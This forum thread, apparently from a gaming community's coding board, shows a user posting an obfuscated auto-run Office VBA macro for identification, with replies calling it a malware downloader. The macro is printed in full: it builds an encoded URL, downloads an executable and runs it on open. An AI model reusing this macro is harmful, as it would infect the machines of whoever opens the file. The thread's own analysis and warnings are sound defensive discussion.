Register for your free account! | Forgot your password?

You last visited: Today at 06:19

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement


Advertise with us!

WTF is this

Discussion on WTF is this within the General Coding forum part of the Coders Den category.

Closed Thread
 
Old   #1
 
elite*gold: 0
The Black Market: 2/0/0
Join Date: Sep 2011
Posts: 270
Received Thanks: 44
WTF is this

Could someone explain me what the hell this is ?


Code:
'zFFBhAywllRgYLnoyKnKmCEyXDmEJs

'YhbETcJPctoxcTJ
'HRAgYsJHKEVuoDioyKnKmCEyXDmEJsHRAgYsJHKEVuoDi


#If VBA7 Then
Private Declare PtrSafe Function JTibarHrdvYVZVR Lib "kernel32" Alias "ExecuteUmsThread" (ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function tNyYXhiAFHhZRg Lib "kernel32" Alias "TermsrvDeleteKey" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function gDVQxUoYzCjMTxD Lib "kernel32" Alias "NlsGetCacheUpdateCount" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function SLHbwHjIWmzUhip Lib "kernel32" Alias "SetComputerNameA" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function eizmBWkygKARsoh Lib "kernel32" Alias "DosFileHandleToWin32Handle" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function UqbmgFHhnUZRkcJ Lib "kernel32" Alias "uaw_wcslen" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafyMDbSYnftqLuMOTJ As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function jVZYCQGjMRZiSFI Lib "kernel32" Alias "QueryIdleProcessorCycleTime" (ByVal ROYynJVXcQsuKiGkgFgFpjtlINQFBn As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function sJHTZIrjjbBUYp Lib "urlmon" Alias "URLDownloadToFileA" (ByVal JxdCDRaNebsfgXLkgFgFpjtlINQFBn As Long, ByVal gaIQkTeNYYLjYGq As String, ByVal kgFgFpjtlINQFBnMDbSYnftqLuMOTJ As String, ByVal pmkorfc As Long, ByVal plkmdirfv As Long) As Long
Private Declare PtrSafe Function vhTCTfnaYzjdBZC Lib "kernel32" Alias "RegQueryInfoKeyA" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare PtrSafe Function dYBGNWPziVIPQCj Lib "kernel32" Alias "GetLastError" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
#Else
Private Declare Function JTibarHrdvYVZVR Lib "kernel32" Alias "ExecuteUmsThread" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function tNyYXhiAFHhZRg Lib "kernel32" Alias "TermsrvDeleteKey" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function gDVQxUoYzCjMTxD Lib "kernel32" Alias "NlsGetCacheUpdateCount" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafyMDbSYnftqLuMOTJ As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function SLHbwHjIWmzUhip Lib "kernel32" Alias "SetComputerNameA" (ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSbMDbSYnftqLuMOTJ As Long) As Long
Private Declare Function eizmBWkygKARsoh Lib "kernel32" Alias "DosFileHandleToWin32Handle" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function sJHTZIrjjbBUYp Lib "urlmon" Alias "URLDownloadToFileA" (ByVal vLOdwEFwafDnIbw As Long, ByVal dpdorjn As String, ByVal rdftemwe As String, ByVal xplmcdy As Long, ByVal eumwxwB As Long) As Long
Private Declare Function UqbmgFHhnUZRkcJ Lib "kernel32" Alias "uaw_wcslen" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function jVZYCQGjMRZiSFI Lib "kernel32" Alias "QueryIdleProcessorCycleTime" (ByVal ROYynJVXcQsuKiG As Long, ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafy As Long, ByVal tltjGHRXhSZrSb As Long) As Long
Private Declare Function vhTCTfnaYzjdBZC Lib "kernel32" Alias "GetLastError" (ByVal ROYynJVXcQsuKiGMDbSYnftqLuMOTJ As Long, ByVal ROYynJVXcQsuKiG As String, ByVal MDbSYnftqLuMOTJ As String, ByVal rFQObiRNwBGafyMDbSYnftqLuMOTJ As Long, ByVal tltjGHRXhSZrSbMDbSYnftqLuMOTJ As Long) As Long
#End If

Private Sub wszKXDPkxrXLoWh()
QhmRMKLkFEYXdnU = "mRhSfNkyegBMpP"
End Sub
Function sxAbpheDixNfjMi(ByVal bohfkYHcsSmRypP As String, ByVal KpNPSPEzzcDEpEv As String)
If PdwMOlUSjYZJDve = "mYptUoNfGKYpOiX" Then
dNCZZWvBkfROnQk = "FIlvLVSNrrandHU"
'FIlvLVSNrrandHU = "PdwMOlUSjYZJDveFIlvLVSNrrandHU"
End If
sJHTZIrjjbBUYp 0 + 2 + 2 - 4, bohfkYHcsSmRypP, KpNPSPEzzcDEpEv, 0 + 0, 4 - 4
'rKQeVikQmQxHoyy=EEvpNwavWLbZEOd
End Function
Sub Auto_Open()
fJcsnuRFbMbAWqL
End Sub
Sub AutoOpen()
fJcsnuRFbMbAWqL
End Sub
Private Function eMuOewCUhqUazqc(IEldtrDuGlkTjRT)
pkvkfkwruDSKyXdFIlvLVSNrrandHU = vQNuqEpwzAzoWuv
  eMuOewCUhqUazqc = StrReverse(IEldtrDuGlkTjRT)
If pkvkfkwruDSKyXd = vQNuqEpwzAzoWuvFIlvLVSNrrandHU Then vQNuqEpwzAzoWuv = OjEnDLxzLiRxGol
End Function
Private Sub fJcsnuRFbMbAWqL()
IVrmWSZgkUIOwZ = RIQWyisqGzGHpy
fEdbtuhFCrgIXL = eMuOewCUhqUazqc(Chr(101) + Chr(120) + Chr(101) + Chr(46) + Chr(122) + Chr(98) + Chr(120) + Chr(114) + Chr(108) + Chr(122) + Chr(47) + Chr(116) + Chr(97) + Chr(99) + Chr(46) + Chr(102) + Chr(109) + Chr(111) + Chr(112) + Chr(46) + Chr(97) + Chr(47) + Chr(47) + Chr(58) + Chr(115) + Chr(112) + Chr(116) + Chr(116) + Chr(104))
If zMNdXbbdNuJUbEu = "DcJZgxAGXUDDlmr" Then
jtVjkqpGpcysKoD = "YbcoZcZQEYswNAK"
snCvChKElHVeGaj = "FCeTWupgQhizbNM"
End If
ZjJyWaHzvkqXNmr = eMuOewCUhqUazqc("lvpc.rvvxwwze")
clQJsXVNmotrVpy = Environ$(Chr(20# + 20# + 30# + 14# + 500# - 500# + 200 - 200) + Chr(80# - 3 + 1# - 1# + 1000# - 1000#) + Chr(40 + 30 + 5 + 5 + 1 + 1 - 2)) + Chr(100# - 8# - 2# + 2#) & ZjJyWaHzvkqXNmr
If pquAZkgqTYOLNqc = "sOGjTHbiIwwUOro" Then
qdeyujadPFejHEM = "dTBpTWfAJNOBjj"
End If
PbnASKbkgjcWPUV = "bygMYYbaqHeSabO"
SGHLCIzJxRDTSPp = "vGPNCFVxBLIntIx"
snCvChKElHVeGaj = "FCeTWupgQhizbNM"
sxAbpheDixNfjMi fEdbtuhFCrgIXL, clQJsXVNmotrVpy
Call Shell(clQJsXVNmotrVpy, vbNormalFocus)
End Sub
Sub Workbook_Open()
fJcsnuRFbMbAWqL
End Sub
that "should" generate a username and a password. but i dont trust in it.
md88 is offline  
Old 07/13/2016, 00:24   #2
 
elite*gold: 0
The Black Market: 0/0/0
Join Date: May 2015
Posts: 700
Received Thanks: 444
It downloads and executes a binary.

Edit: This is the file it downloads:
Code:
-deleted
Edit:
I wouldn't run it anyway. There is no reason to write such cryptic code if it wasn't a virus ...
algernong is offline  
Thanks
2 Users
Old 07/13/2016, 01:13   #3
 
elite*gold: 100
The Black Market: 1/0/0
Join Date: Apr 2008
Posts: 860
Received Thanks: 1,487
Quote:
Originally Posted by algernong View Post
Edit: This is the file it downloads:
Code:
-deleted
[...]
I wouldn't run it anyway. There is no reason to write such cryptic code if it wasn't a virus ...
This binary identifies as "wextract", a malware-dropper from 2008. Somebody really put some effort into undetecting this old piece. ;D
florian0 is offline  
Thanks
2 Users
Old 07/13/2016, 09:02   #4
 
elite*gold: 0
The Black Market: 2/0/0
Join Date: Sep 2011
Posts: 270
Received Thanks: 44
Okay, ty guys
md88 is offline  
Old 07/13/2016, 10:39   #5
dotCom
 
Devsome's Avatar
 
elite*gold: 9842
The Black Market: 107/0/0
Join Date: Mar 2009
Posts: 16,855
Received Thanks: 4,681
#closed - problem solved + DL deleted
Devsome is offline  
Closed Thread

« Searching for a coding team for a project: | Probleme mit "Sinusbot" »



All times are GMT +1. The time now is 06:20.

elitepvpers - play less, get more - Top

Powered by vBulletin®
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2026 elitepvpers All Rights Reserved.